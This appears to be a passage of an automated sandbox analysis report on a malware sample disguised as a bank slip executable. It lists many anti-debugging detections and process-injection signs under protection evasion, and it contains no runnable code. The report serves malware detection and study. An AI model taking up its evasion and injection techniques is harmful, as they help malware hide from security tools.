                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B27ED mov eax, dword ptr fs:[00000030h]2_2_017B27ED
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B27ED mov eax, dword ptr fs:[00000030h]2_2_017B27ED
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B27ED mov eax, dword ptr fs:[00000030h]2_2_017B27ED
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180C730 mov eax, dword ptr fs:[00000030h]2_2_0180C730
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179C7C0 mov eax, dword ptr fs:[00000030h]2_2_0179C7C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01814755 mov eax, dword ptr fs:[00000030h]2_2_01814755
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017907AF mov eax, dword ptr fs:[00000030h]2_2_017907AF
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181E75D mov eax, dword ptr fs:[00000030h]2_2_0181E75D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C2674 mov eax, dword ptr fs:[00000030h]2_2_017C2674
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA660 mov eax, dword ptr fs:[00000030h]2_2_017CA660
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA660 mov eax, dword ptr fs:[00000030h]2_2_017CA660
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AC640 mov eax, dword ptr fs:[00000030h]2_2_017AC640
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179262C mov eax, dword ptr fs:[00000030h]2_2_0179262C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C6620 mov eax, dword ptr fs:[00000030h]2_2_017C6620
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C8620 mov eax, dword ptr fs:[00000030h]2_2_017C8620
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE627 mov eax, dword ptr fs:[00000030h]2_2_017AE627
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D2619 mov eax, dword ptr fs:[00000030h]2_2_017D2619
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018106F1 mov eax, dword ptr fs:[00000030h]2_2_018106F1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018106F1 mov eax, dword ptr fs:[00000030h]2_2_018106F1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A260B mov eax, dword ptr fs:[00000030h]2_2_017A260B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A260B mov eax, dword ptr fs:[00000030h]2_2_017A260B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A260B mov eax, dword ptr fs:[00000030h]2_2_017A260B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A260B mov eax, dword ptr fs:[00000030h]2_2_017A260B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A260B mov eax, dword ptr fs:[00000030h]2_2_017A260B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A260B mov eax, dword ptr fs:[00000030h]2_2_017A260B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A260B mov eax, dword ptr fs:[00000030h]2_2_017A260B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E6F2 mov eax, dword ptr fs:[00000030h]2_2_0180E6F2
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E6F2 mov eax, dword ptr fs:[00000030h]2_2_0180E6F2
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E6F2 mov eax, dword ptr fs:[00000030h]2_2_0180E6F2
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E6F2 mov eax, dword ptr fs:[00000030h]2_2_0180E6F2
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E609 mov eax, dword ptr fs:[00000030h]2_2_0180E609
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA6C7 mov ebx, dword ptr fs:[00000030h]2_2_017CA6C7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA6C7 mov eax, dword ptr fs:[00000030h]2_2_017CA6C7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C66B0 mov eax, dword ptr fs:[00000030h]2_2_017C66B0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC6A6 mov eax, dword ptr fs:[00000030h]2_2_017CC6A6
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794690 mov eax, dword ptr fs:[00000030h]2_2_01794690
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794690 mov eax, dword ptr fs:[00000030h]2_2_01794690
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185866E mov eax, dword ptr fs:[00000030h]2_2_0185866E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185866E mov eax, dword ptr fs:[00000030h]2_2_0185866E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D096E mov eax, dword ptr fs:[00000030h]2_2_017D096E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D096E mov edx, dword ptr fs:[00000030h]2_2_017D096E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D096E mov eax, dword ptr fs:[00000030h]2_2_017D096E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B6962 mov eax, dword ptr fs:[00000030h]2_2_017B6962
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B6962 mov eax, dword ptr fs:[00000030h]2_2_017B6962
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B6962 mov eax, dword ptr fs:[00000030h]2_2_017B6962
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018189B3 mov esi, dword ptr fs:[00000030h]2_2_018189B3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018189B3 mov eax, dword ptr fs:[00000030h]2_2_018189B3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018189B3 mov eax, dword ptr fs:[00000030h]2_2_018189B3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018269C0 mov eax, dword ptr fs:[00000030h]2_2_018269C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185A9D3 mov eax, dword ptr fs:[00000030h]2_2_0185A9D3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01788918 mov eax, dword ptr fs:[00000030h]2_2_01788918
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01788918 mov eax, dword ptr fs:[00000030h]2_2_01788918
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181E9E0 mov eax, dword ptr fs:[00000030h]2_2_0181E9E0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C29F9 mov eax, dword ptr fs:[00000030h]2_2_017C29F9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C29F9 mov eax, dword ptr fs:[00000030h]2_2_017C29F9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E908 mov eax, dword ptr fs:[00000030h]2_2_0180E908
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E908 mov eax, dword ptr fs:[00000030h]2_2_0180E908
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181C912 mov eax, dword ptr fs:[00000030h]2_2_0181C912
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A9D0 mov eax, dword ptr fs:[00000030h]2_2_0179A9D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A9D0 mov eax, dword ptr fs:[00000030h]2_2_0179A9D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A9D0 mov eax, dword ptr fs:[00000030h]2_2_0179A9D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A9D0 mov eax, dword ptr fs:[00000030h]2_2_0179A9D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A9D0 mov eax, dword ptr fs:[00000030h]2_2_0179A9D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A9D0 mov eax, dword ptr fs:[00000030h]2_2_0179A9D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0182892B mov eax, dword ptr fs:[00000030h]2_2_0182892B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181892A mov eax, dword ptr fs:[00000030h]2_2_0181892A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C49D0 mov eax, dword ptr fs:[00000030h]2_2_017C49D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864940 mov eax, dword ptr fs:[00000030h]2_2_01864940
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01810946 mov eax, dword ptr fs:[00000030h]2_2_01810946
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017909AD mov eax, dword ptr fs:[00000030h]2_2_017909AD
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017909AD mov eax, dword ptr fs:[00000030h]2_2_017909AD
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A29A0 mov eax, dword ptr fs:[00000030h]2_2_017A29A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01834978 mov eax, dword ptr fs:[00000030h]2_2_01834978
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01834978 mov eax, dword ptr fs:[00000030h]2_2_01834978
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181C97C mov eax, dword ptr fs:[00000030h]2_2_0181C97C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181C89D mov eax, dword ptr fs:[00000030h]2_2_0181C89D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794859 mov eax, dword ptr fs:[00000030h]2_2_01794859
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794859 mov eax, dword ptr fs:[00000030h]2_2_01794859
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C0854 mov eax, dword ptr fs:[00000030h]2_2_017C0854
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A2840 mov ecx, dword ptr fs:[00000030h]2_2_017A2840
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018608C0 mov eax, dword ptr fs:[00000030h]2_2_018608C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA830 mov eax, dword ptr fs:[00000030h]2_2_017CA830
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B2835 mov eax, dword ptr fs:[00000030h]2_2_017B2835
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B2835 mov eax, dword ptr fs:[00000030h]2_2_017B2835
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B2835 mov eax, dword ptr fs:[00000030h]2_2_017B2835
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B2835 mov ecx, dword ptr fs:[00000030h]2_2_017B2835
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B2835 mov eax, dword ptr fs:[00000030h]2_2_017B2835
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B2835 mov eax, dword ptr fs:[00000030h]2_2_017B2835
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185A8E4 mov eax, dword ptr fs:[00000030h]2_2_0185A8E4
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC8F9 mov eax, dword ptr fs:[00000030h]2_2_017CC8F9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC8F9 mov eax, dword ptr fs:[00000030h]2_2_017CC8F9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181C810 mov eax, dword ptr fs:[00000030h]2_2_0181C810
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183483A mov eax, dword ptr fs:[00000030h]2_2_0183483A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183483A mov eax, dword ptr fs:[00000030h]2_2_0183483A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE8C0 mov eax, dword ptr fs:[00000030h]2_2_017BE8C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01826870 mov eax, dword ptr fs:[00000030h]2_2_01826870
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01826870 mov eax, dword ptr fs:[00000030h]2_2_01826870
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181E872 mov eax, dword ptr fs:[00000030h]2_2_0181E872
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181E872 mov eax, dword ptr fs:[00000030h]2_2_0181E872
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01790887 mov eax, dword ptr fs:[00000030h]2_2_01790887
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178CB7E mov eax, dword ptr fs:[00000030h]2_2_0178CB7E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01788B50 mov eax, dword ptr fs:[00000030h]2_2_01788B50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01844BB0 mov eax, dword ptr fs:[00000030h]2_2_01844BB0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01844BB0 mov eax, dword ptr fs:[00000030h]2_2_01844BB0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183EBD0 mov eax, dword ptr fs:[00000030h]2_2_0183EBD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BEB20 mov eax, dword ptr fs:[00000030h]2_2_017BEB20
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BEB20 mov eax, dword ptr fs:[00000030h]2_2_017BEB20
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181CBF0 mov eax, dword ptr fs:[00000030h]2_2_0181CBF0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864B00 mov eax, dword ptr fs:[00000030h]2_2_01864B00
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BEBFC mov eax, dword ptr fs:[00000030h]2_2_017BEBFC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798BF0 mov eax, dword ptr fs:[00000030h]2_2_01798BF0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798BF0 mov eax, dword ptr fs:[00000030h]2_2_01798BF0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798BF0 mov eax, dword ptr fs:[00000030h]2_2_01798BF0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180EB1D mov eax, dword ptr fs:[00000030h]2_2_0180EB1D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180EB1D mov eax, dword ptr fs:[00000030h]2_2_0180EB1D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180EB1D mov eax, dword ptr fs:[00000030h]2_2_0180EB1D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180EB1D mov eax, dword ptr fs:[00000030h]2_2_0180EB1D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180EB1D mov eax, dword ptr fs:[00000030h]2_2_0180EB1D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180EB1D mov eax, dword ptr fs:[00000030h]2_2_0180EB1D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180EB1D mov eax, dword ptr fs:[00000030h]2_2_0180EB1D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180EB1D mov eax, dword ptr fs:[00000030h]2_2_0180EB1D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180EB1D mov eax, dword ptr fs:[00000030h]2_2_0180EB1D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01858B28 mov eax, dword ptr fs:[00000030h]2_2_01858B28
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01858B28 mov eax, dword ptr fs:[00000030h]2_2_01858B28
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B0BCB mov eax, dword ptr fs:[00000030h]2_2_017B0BCB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B0BCB mov eax, dword ptr fs:[00000030h]2_2_017B0BCB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B0BCB mov eax, dword ptr fs:[00000030h]2_2_017B0BCB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01790BCD mov eax, dword ptr fs:[00000030h]2_2_01790BCD
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01790BCD mov eax, dword ptr fs:[00000030h]2_2_01790BCD
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01790BCD mov eax, dword ptr fs:[00000030h]2_2_01790BCD
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01838B42 mov eax, dword ptr fs:[00000030h]2_2_01838B42
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01826B40 mov eax, dword ptr fs:[00000030h]2_2_01826B40
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01826B40 mov eax, dword ptr fs:[00000030h]2_2_01826B40
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0BBE mov eax, dword ptr fs:[00000030h]2_2_017A0BBE
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0BBE mov eax, dword ptr fs:[00000030h]2_2_017A0BBE
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185AB40 mov eax, dword ptr fs:[00000030h]2_2_0185AB40
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01844B4B mov eax, dword ptr fs:[00000030h]2_2_01844B4B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01844B4B mov eax, dword ptr fs:[00000030h]2_2_01844B4B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01862B57 mov eax, dword ptr fs:[00000030h]2_2_01862B57
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01862B57 mov eax, dword ptr fs:[00000030h]2_2_01862B57
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01862B57 mov eax, dword ptr fs:[00000030h]2_2_01862B57
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01862B57 mov eax, dword ptr fs:[00000030h]2_2_01862B57
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183EB50 mov eax, dword ptr fs:[00000030h]2_2_0183EB50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864A80 mov eax, dword ptr fs:[00000030h]2_2_01864A80
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CCA6F mov eax, dword ptr fs:[00000030h]2_2_017CCA6F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CCA6F mov eax, dword ptr fs:[00000030h]2_2_017CCA6F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CCA6F mov eax, dword ptr fs:[00000030h]2_2_017CCA6F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0A5B mov eax, dword ptr fs:[00000030h]2_2_017A0A5B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0A5B mov eax, dword ptr fs:[00000030h]2_2_017A0A5B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B4A35 mov eax, dword ptr fs:[00000030h]2_2_017B4A35
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B4A35 mov eax, dword ptr fs:[00000030h]2_2_017B4A35
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BEA2E mov eax, dword ptr fs:[00000030h]2_2_017BEA2E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CCA24 mov eax, dword ptr fs:[00000030h]2_2_017CCA24
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181CA11 mov eax, dword ptr fs:[00000030h]2_2_0181CA11
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CAAEE mov eax, dword ptr fs:[00000030h]2_2_017CAAEE
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CAAEE mov eax, dword ptr fs:[00000030h]2_2_017CAAEE
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01790AD0 mov eax, dword ptr fs:[00000030h]2_2_01790AD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C4AD0 mov eax, dword ptr fs:[00000030h]2_2_017C4AD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C4AD0 mov eax, dword ptr fs:[00000030h]2_2_017C4AD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E6ACC mov eax, dword ptr fs:[00000030h]2_2_017E6ACC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E6ACC mov eax, dword ptr fs:[00000030h]2_2_017E6ACC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E6ACC mov eax, dword ptr fs:[00000030h]2_2_017E6ACC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798AA0 mov eax, dword ptr fs:[00000030h]2_2_01798AA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798AA0 mov eax, dword ptr fs:[00000030h]2_2_01798AA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E6AA4 mov eax, dword ptr fs:[00000030h]2_2_017E6AA4
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183EA60 mov eax, dword ptr fs:[00000030h]2_2_0183EA60
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C8A90 mov edx, dword ptr fs:[00000030h]2_2_017C8A90
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180CA72 mov eax, dword ptr fs:[00000030h]2_2_0180CA72
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180CA72 mov eax, dword ptr fs:[00000030h]2_2_0180CA72
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeNtClose: Direct from: 0x76F02B6C
